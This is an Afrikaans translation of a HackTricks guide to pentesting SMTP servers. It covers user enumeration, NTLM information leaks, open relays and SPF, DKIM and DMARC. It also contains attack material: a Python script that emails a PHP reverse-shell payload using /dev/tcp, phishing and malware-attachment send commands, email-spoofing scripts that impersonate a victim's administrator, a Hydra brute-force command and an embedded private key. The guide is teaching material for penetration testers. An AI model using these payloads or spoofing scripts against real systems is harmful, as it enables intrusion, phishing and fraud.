hacktricks/network-services-pentesting/pentesting-smtp/README.md

607 lines
33 KiB
Markdown

# 25,465,587 - Pentesting SMTP/s
<details>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ander maniere om HackTricks te ondersteun:
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap & kenmerke wat strek vanaf rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporing & uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te delf, skulpe te laat pop, en pret te hê.
{% embed url="https://pentest-tools.com/" %}
## **Basiese Inligting**
Die **Simple Mail Transfer Protocol (SMTP)** is 'n protokol wat binne die TCP/IP-reeks gebruik word vir die **stuur en ontvang van e-pos**. As gevolg van sy beperkings in die toustaan van boodskappe aan die ontvanger se kant, word SMTP dikwels saam met **POP3 of IMAP** gebruik. Hierdie bykomende protokolle stel gebruikers in staat om boodskappe op 'n bedienerposbus te stoor en dit periodiek af te laai.
In die praktyk is dit algemeen vir **e-posprogramme** om **SMTP te gebruik vir die stuur van e-posse**, terwyl hulle **POP3 of IMAP gebruik vir die ontvang** daarvan. Op Unix-gebaseerde stelsels, steek **sendmail** uit as die SMTP-bedienaar wat meesal vir e-posdoeleindes gebruik word. Die kommersiële pakket bekend as Sendmail sluit 'n POP3-bedienaar in. Verder bied **Microsoft Exchange** 'n SMTP-bedienaar en bied die opsie om POP3-ondersteuning in te sluit.
**Verstekpoort:** 25,465(ssl),587(ssl)
```
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack Microsoft ESMTP 6.0.3790.3959
```
### EPOS-Opmerkings
Indien jy die geleentheid het om die slagoffer 'n e-pos te laat stuur (byvoorbeeld via die kontakvorm van die webwerf), doen dit omdat jy dalk meer te wete kan kom oor die interne topologie van die slagoffer deur na die opmerkings van die e-pos te kyk.
Jy kan ook 'n e-pos van 'n SMTP-bediener kry wat probeer om 'n e-pos aan 'n nie-bestaande adres op daardie bediener te stuur (omdat die bediener 'n NDN-e-pos aan die aanvaller sal stuur). Maak seker dat jy die e-pos van 'n toegelate adres stuur (kontroleer die SPF-beleid) en dat jy NDN-boodskappe kan ontvang.
Jy behoort ook verskillende inhoud te stuur omdat jy meer interessante inligting in die opmerkings kan vind soos: `X-Virus-Scanned: by av.domain.com`\
Jy behoort die EICAR toetslêer te stuur.\
Die opsporing van die AV kan jou in staat stel om bekende kwesbaarhede uit te buit.
## Basiese aksies
### **Banner Grabbing/ Basiese verbinding**
**SMTP:**
```bash
nc -vn <IP> 25
```
**SMTPS**:
```bash
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
```
### Vind MX-bedieners van 'n organisasie
```bash
dig +short mx google.com
```
### Opsomming
```bash
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
### NTLM Auth - Inligtingsoffening
Indien die bediener NTLM-outentifisering ondersteun (Windows) kan jy sensitiewe inligting (weergawes) verkry. Meer inligting [**hier**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666).
```bash
root@kali: telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM 334
NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
```
Of **outomatiseer** dit met **nmap** invoegtoepassing `smtp-ntlm-info.nse`
### Interne bedienernaam - Inligtingsoortdringing
Sommige SMTP-bedieners vul outomaties 'n afsender se adres aan wanneer die opdrag "MAIL FROM" uitgereik word sonder 'n volledige adres, wat sy interne naam openbaar maak:
```
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
250-somedomain.com Hello [x.x.x.x]
250-TURN
250-SIZE 52428800
250-ETRN
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-8bitmime
250-BINARYMIME
250-CHUNKING
250-VRFY
250 OK
MAIL FROM: me
250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK
```
### Sniffing
Kyk of jy enige wagwoorde kan snuif van die pakkies na poort 25
### [Auth bruteforce](../../generic-methodologies-and-resources/brute-force.md#smtp)
## Gebruikersnaam Bruteforce Opsomming
**Verifikasie is nie altyd nodig nie**
### RCPT TO
```bash
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
MAIL FROM:example@domain.com
250 2.1.0 example@domain.com... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok
```
### VRFY
VRFY (Verify) is an SMTP command used to verify whether a specific username or email address exists within a mail server. This command can be abused by attackers to gather information about valid user accounts on the target system. It is recommended to disable the VRFY command on mail servers to prevent this type of enumeration attack.
```bash
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
VRFY root
250 Super-User root@myhost
VRFY blah
550 blah... User unknown
```
### EXPN
#### Omskrywing
Die `EXPN`-bevel word gebruik om die volle naam van 'n e-posadres of lys van e-posadresse op 'n SMTP-bedienaar te onthul. Dit kan 'n potensiële bedreiging vir privaatheid wees deur die blootstelling van e-posadresse wat normaalweg nie vir die publiek beskikbaar is nie.
```bash
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 ed.williams@myhost
EXPN sshd
250 2.1.5 sshd privsep sshd@myhost
```
### Outomatiese gereedskap
```
Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>
```
<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & pentesting**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en kenmerke wat strek vanaf rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporing- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te delf, skulpe te laat spat, en pret te hê.
{% embed url="https://pentest-tools.com/" %}
## DSN Verslae
**Afleweringsstatuskennisgewingsverslae**: As jy 'n **e-pos** na 'n organisasie stuur na 'n **ongeldige adres**, sal die organisasie jou in kennis stel dat die adres ongeldig was deur 'n **e-pos terug te stuur na jou**. **Koppe** van die teruggekeerde e-pos sal moontlik **sensitiewe inligting bevat** (soos IP-adres van die e-posdiens wat met die verslae geïnteraksioneer het of inligting oor antivirusagteware).
## [Opdragte](smtp-commands.md)
### Stuur 'n e-pos vanaf die Linux-konsole
```bash
sendEmail -t to@domain.com -f from@attacker.com -s <ip smtp> -u "Important subject" -a /tmp/malware.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.
<phishing message>
```
```bash
swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
```
### Stuur 'n E-pos met Python
<details>
<summary>Python-kode hier</summary>
```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys
lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587
# create message object instance
msg = MIMEMultipart()
# setup the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"
# payload
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
print("[*] Payload is generated : %s" % message)
msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)
if server.noop()[0] != 250:
print("[-]Connection Error")
exit()
server.starttls()
# Uncomment if log-in with authencation
# server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
print("[***]successfully sent email to %s:" % (msg['To']))
```
</details>
## SMTP Smuggling
SMTP Smuggling-kwesbaarheid het toegelaat om alle SMTP-beskermingsmaatreëls te omseil (kyk na die volgende afdeling vir meer inligting oor beskermings). Vir meer inligting oor SMTP Smuggling, kyk:
{% content-ref url="smtp-smuggling.md" %}
[smtp-smuggling.md](smtp-smuggling.md)
{% endcontent-ref %}
## E-posvervalsing Teenmaatreëls
Organisasies word verhoed om ongemagtigde e-posse namens hulle te stuur deur **SPF**, **DKIM**, en **DMARC** te gebruik as gevolg van die maklikheid van e-posvervalsing.
'n **Volledige gids vir hierdie teenmaatreëls** is beskikbaar by [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).
### SPF
{% hint style="danger" %}
SPF [was "verouderd" in 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Dit beteken dat in plaas van 'n **TXT-rekord** te skep in `_spf.domain.com`, skep jy dit in `domain.com` met dieselfde sintaksis.\
Verder, om vorige spf-rekords her te gebruik, is dit baie algemeen om iets soos `"v=spf1 include:_spf.google.com ~all"` te vind.
{% endhint %}
**Sender Policy Framework** (SPF) is 'n meganisme wat E-posoorplasingsagente (MTA's) in staat stel om te verifieer of 'n gas wat 'n e-pos stuur, gemagtig is deur 'n lys van gemagtigde posdiensverskaffers wat deur die organisasies gedefinieer is, te ondervra. Hierdie lys, wat IP-adresse/reeks, domeine, en ander entiteite spesifiseer wat **gemagtig is om e-pos namens 'n domeinnaam te stuur**, sluit verskeie "**Meganismes**" in die SPF-rekord in.
#### Meganismes
Vanaf [Wikipedia](https://en.wikipedia.org/wiki/Sender\_Policy\_Framework):
| Meganisme | Beskrywing |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALLES | Pas altyd; gebruik vir 'n verstekresultaat soos `-all` vir alle IP's wat nie deur vorige meganismes gekoppel word nie. |
| A | As die domeinnaam 'n adresrekord (A of AAAA) het wat na die afzender se adres opgelos kan word, sal dit pas. |
| IP4 | As die afzender in 'n gegewe IPv4-adresreeks is, pas dit. |
| IP6 | As die afzender in 'n gegewe IPv6-adresreeks is, pas dit. |
| MX | As die domeinnaam 'n MX-rekord het wat na die afzender se adres oplos, sal dit pas (m.a.w. die e-pos kom van een van die domein se inkomende posdiensverskaffers). |
| PTR | As die domeinnaam (PTR-rekord) vir die klient se adres in die gegewe domein is en daardie domeinnaam na die klient se adres oplos (voorwaarts-bevestigde omgekeerde DNS), pas dit. Hierdie meganisme word afgeraad en moet vermy word, indien moontlik. |
| BESTAAN | As die gegewe domeinnaam na enige adres oplos, pas dit (ongeag die adres waarheen dit oplos). Dit word selde gebruik. Tesame met die SPF-makrotaal bied dit meer komplekse koppeling soos DNSBL-navrae. |
| INSLEUTEL | Verwys na die beleid van 'n ander domein. As daardie domein se beleid slaag, slaag hierdie meganisme. Indien die ingeslote beleid egter misluk, word die verwerking voortgesit. Om ten volle na 'n ander domein se beleid te delegeer, moet die omskakelinguitbreiding gebruik word. |
| HERLEI | <p>'n Herlei is 'n aanwyser na 'n ander domeinnaam wat 'n SPF-beleid huisves, dit maak dit moontlik vir verskeie domeine om dieselfde SPF-beleid te deel. Dit is nuttig wanneer daar met 'n groot hoeveelheid domeine gewerk word wat dieselfde e-posinfrastruktuur deel.</p><p>Die SPF-beleid van die domein wat in die herlei-meganisme aangedui word, sal gebruik word.</p> |
Dit is ook moontlik om **Kwalifiseerders** te identifiseer wat aandui **wat gedoen moet word as 'n meganisme gekoppel word**. Standaard word die **kwalifiseerder "+"** gebruik (dus as enige meganisme gekoppel word, beteken dit dit is toegelaat).\
Gewoonlik sal jy **aan die einde van elke SPF-beleid** iets soos: **\~all** of **-all** opmerk. Dit word gebruik om aan te dui dat **as die afzender nie aan enige SPF-beleid voldoen nie, jy die e-pos as onbetroubaar (\~) moet merk of die e-pos moet verwerp (-)**.
#### Kwalifiseerders
Elke meganisme binne die beleid kan voorafgegaan word deur een van vier kwalifiseerders om die bedoelde resultaat te definieer:
* **`+`**: Stem ooreen met 'n SUKSES-resultaat. Standaard aanvaar meganismes hierdie kwalifiseerder, wat `+mx` gelykstaande maak aan `mx`.
* **`?`**: Verteenwoordig 'n NEUTRALE resultaat, wat soortgelyk behandel word as GEEN (geen spesifieke beleid).
* **`~`**: Dui SOFTFAIL aan, as 'n middelgrond tussen NEUTRAAL en MISLUK. E-posse wat aan hierdie resultaat voldoen, word tipies aanvaar maar dienooreenkomstig gemerk.
* **`-`**: Dui MISLUK aan, wat aandui dat die e-pos heeltemal verwerp moet word.
In die naderende voorbeeld word die **SPF-beleid van google.com** geïllustreer. Let op die insluiting van SPF-beleide van verskillende domeine binne die eerste SPF-beleid:
```shell-session
dig txt google.com | grep spf
google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all"
dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com. IN TXT
_spf.google.com. 235 IN TXT "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"
dig txt _netblocks.google.com | grep spf
_netblocks.google.com. 1606 IN TXT "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"
dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"
dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
```
Tradisioneel was dit moontlik om enige domeinnaam te vervals wat nie 'n korrekte/geen SPF-rekord het nie. **Vandag**, as 'n **e-pos** afkomstig is van 'n **domein sonder 'n geldige SPF-rekord** sal dit waarskynlik **outomaties as onbetroubaar verwerp/gemerk word**.
Om die SPF van 'n domein te kontroleer, kan jy aanlyn gereedskap soos gebruik: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
### DKIM (DomainKeys Identified Mail)
DKIM word gebruik om uitgaande e-posse te onderteken, wat hul validasie deur eksterne Mail Transfer Agents (MTA's) moontlik maak deur die ophaling van die publieke sleutel van die domein uit DNS. Hierdie publieke sleutel word gevind in 'n domein se TXT-rekord. Om toegang tot hierdie sleutel te verkry, moet 'n persoon beide die kieser en die domeinnaam ken.
Byvoorbeeld, om die sleutel aan te vra, is die domeinnaam en kieser noodsaaklik. Hierdie kan gevind word in die e-pos se kop `DKIM-Signature`, bv., `d=gmail.com;s=20120113`.
'n Opdrag om hierdie inligting op te haal kan lyk soos:
```bash
dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
```
### DMARC (Domain-based Message Authentication, Reporting & Conformance)
DMARC verbeter e-possekerheid deur voort te bou op SPF en DKIM-protokolle. Dit skets beleide wat posbedieners lei in die hantering van e-posse van 'n spesifieke domein, insluitend hoe om te werk met verifikasie-mislukkings en waar om verslae oor e-posverwerkingaksies heen te stuur.
**Om die DMARC-rekord te verkry, moet jy die subdomein \_dmarc ondervra**
```bash
# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com. 3600 IN TXT "v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"
# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com. 300 IN TXT "v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"
# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"
```
#### DMARC-tabelle
| Tag Naam | Doel | Voorbeeld |
| -------- | --------------------------------------------- | ------------------------------- |
| v | Protokol weergawe | v=DMARC1 |
| pct | Persentasie van boodskappe onderwerp aan filter | pct=20 |
| ruf | Verslagdoenings-URI vir forensiese verslae | ruf=mailto:authfail@example.com |
| rua | Verslagdoenings-URI van aggregaat verslae | rua=mailto:aggrep@example.com |
| p | Beleid vir organisatoriese domein | p=quarantine |
| sp | Beleid vir subdomeine van die OD | sp=reject |
| adkim | Uitlynmodus vir DKIM | adkim=s |
| aspf | Uitlynmodus vir SPF | aspf=r |
### **Wat van Subdomeine?**
**Van** [**hier**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
Jy moet afsonderlike SPF-rekords hê vir elke subdomein waarvandaan jy e-pos wil stuur.\
Die volgende is oorspronklik geplaas op openspf.org, wat 'n goeie bron was vir hierdie soort dinge.
> Die Duiwelvraag: Wat van subdomeine?
>
> As ek e-pos van pielovers.demon.co.uk kry, en daar is geen SPF-data vir pielovers nie, moet ek teruggaan na die volgende vlak en SPF vir demon.co.uk toets? Nee. Elke subdomein by Demon is 'n ander kliënt, en elke kliënt kan sy eie beleid hê. Dit sou nie sin maak vir Demon se beleid om per verstek op al sy kliënte van toepassing te wees nie; as Demon dit wil doen, kan dit SPF-rekords vir elke subdomein opstel.
>
> Dus is die advies aan SPF-uitgewers as volg: jy moet 'n SPF-rekord vir elke subdomein of gasheernaam wat 'n A- of MX-rekord het, byvoeg.
>
> Webwerwe met wildkaart A- of MX-rekords moet ook 'n wildkaart SPF-rekord hê, van die vorm: \* IN TXT "v=spf1 -all"
Dit maak sin - 'n subdomein kan heel moontlik in 'n ander geografiese ligging wees en 'n baie verskillende SPF-definisie hê.
### **Oop Relais**
Wanneer e-posse gestuur word, is dit van kritieke belang om te verseker dat hulle nie as spam geïdentifiseer word nie. Dit word dikwels bereik deur die gebruik van 'n **relaisbediener wat deur die ontvanger vertrou word**. 'n Algemene uitdaging is egter dat administrateurs dalk nie ten volle bewus is van watter **IP-reeks veilig is om toe te laat nie**. Hierdie gebrek aan begrip kan lei tot foute in die opstel van die SMTP-bedieners, 'n risiko wat dikwels geïdentifiseer word in sekuriteitsassesserings.
'N Oorkomingsmetode wat sommige administrateurs gebruik om e-posleweringprobleme te vermy, veral met betrekking tot kommunikasie met potensiële of lopende kliënte, is om **verbindings van enige IP-adres toe te laat**. Dit word gedoen deur die `mynetworks`-parameter van die SMTP-bediener te konfigureer om alle IP-adresse te aanvaar, soos hieronder weergegee:
```bash
mynetworks = 0.0.0.0/0
```
Vir die bepaling of 'n e-posbediener 'n oop relê is (wat beteken dat dit e-pos van enige eksterne bron kan deurstuur), word die `nmap`-werktuig dikwels gebruik. Dit sluit 'n spesifieke skrips in wat ontwerp is om dit te toets. Die bevel om 'n uitvoerige skandering op 'n bediener uit te voer (byvoorbeeld, met IP 10.10.10.10) op poort 25 met behulp van `nmap` is:
```bash
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
### **Gereedskap**
* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Kontroleer vir SPF en DMARC verkeerde konfigurasies**
* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Kry outomaties SPF en DMARC konfigurasies**
### Stuur Vervals E-pos
* [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index)
* [**http://www.anonymailer.net/**](http://www.anonymailer.net)
* [**https://emkei.cz/**](https://emkei.cz/)
**Of jy kan 'n gereedskap gebruik:**
* [**https://github.com/magichk/magicspoofing**](https://github.com/magichk/magicspoofing)
```bash
# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
```
{% hint style="warning" %}
Indien jy enige fout kry wanneer jy die dkim python lib gebruik om die sleutel te ontleed, voel vry om die volgende een te gebruik.\
**NOTA**: Dit is net 'n vinnige oplossing om vinnige kontroles te doen in gevalle waar die openssl privaatsleutel om een of ander rede **nie deur dkim ontleed kan word nie**.
```
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----
```
{% endhint %}
**Of jy kan dit handmatig doen:**
{% tabs %}
{% tab title="PHP" %}
<pre class="language-php"><code class="lang-php"><strong># Dit sal 'n ondertekende boodskap stuur
</strong><strong>mail("jou_email@gmail.com", "Toets onderwerp!", "hallo! Dit is 'n toets", "Van: administrator@slagoffer.com");
</strong></code></pre>
{% endtab %}
{% tab title="Python" %}
```python
# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py
import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
# Set params
destination="destination@gmail.com"
sender="administrator@victim.com"
subject="Test"
message_html="""
<html>
<body>
<h3>This is a test, not a scam</h3>
<br />
</body>
</html>
"""
sender_domain=sender.split("@")[1]
# Prepare postfix
os.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
os.system("systemctl restart postfix")
# Generate DKIM keys
dkim_private_key_path="dkimprivatekey.pem"
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
with open(dkim_private_key_path) as fh:
dkim_private_key = fh.read()
# Generate email
msg = MIMEMultipart("alternative")
msg.attach(MIMEText(message_html, "html"))
msg["To"] = destination
msg["From"] = sender
msg["Subject"] = subject
headers = [b"To", b"From", b"Subject"]
msg_data = msg.as_bytes()
# Sign email with dkim
## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)
dkim_selector="s1"
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
msg_data = msg.as_bytes()
# Use local postfix relay to send email
smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)
```
{% endtab %}
{% endtabs %}
### **Meer inligting**
**Vind meer inligting oor hierdie beskermings in** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/)
### **Ander hengel aanduiders**
* Ouderdom van die domein
* Skakels wat na IP-adresse wys
* Skakel manipulasie tegnieke
* Verdagte (ongewone) aanhangsels
* Gebroke e-pos inhoud
* Waardes wat gebruik word wat verskil van dié van die poskoppe
* Bestaan van 'n geldige en vertroude SSL-sertifikaat
* Indiening van die bladsy na webinhoudsfilteringswebwerwe
## Uitlekking deur SMTP
**As jy data via SMTP kan stuur** [**lees hierdie**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**.**
## Konfigurasie lêer
### Postfix
Gewoonlik, as geïnstalleer, in `/etc/postfix/master.cf` bevat **skripte om uit te voer** wanneer byvoorbeeld 'n nuwe e-pos deur 'n gebruiker ontvang word. Byvoorbeeld die lyn `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` beteken dat `/etc/postfix/filtering` uitgevoer sal word as 'n nuwe e-pos deur die gebruiker mark ontvang word.
Ander konfigurasie lêers:
```
sendmail.cf
submit.cf
```
## Verwysings
* [https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/](https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/)
* [https://www.reddit.com/r/HowToHack/comments/101it4u/what\_could\_hacker\_do\_with\_misconfigured\_smtp/](https://www.reddit.com/r/HowToHack/comments/101it4u/what\_could\_hacker\_do\_with\_misconfigured\_smtp/)
```
Protocol_Name: SMTP #Protocol Abbreviation if there is one.
Port_Number: 25,465,587 #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
https://book.hacktricks.xyz/pentesting/pentesting-smtp
Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25
Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}
Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}
Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587
Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}
Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V
Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
